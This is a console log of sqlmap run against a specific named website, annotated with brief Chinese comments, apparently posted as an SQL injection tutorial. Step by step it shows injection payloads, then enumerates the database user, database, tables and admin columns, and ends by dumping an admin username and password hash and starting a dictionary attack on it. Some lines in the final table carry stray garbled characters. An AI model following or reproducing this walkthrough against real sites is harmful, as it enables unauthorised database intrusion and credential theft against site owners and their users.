D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
# r# X1 P6 U' u+ z v7 D/ H, a6 B| password | userid | H% j! W2 s# @9 g2 ` z$ `# v
+----------------------------------+------------+
/ @3 L3 ]' M6 ]% J| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
) A7 z! M/ {4 ~/ \! ^2 I$ L+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |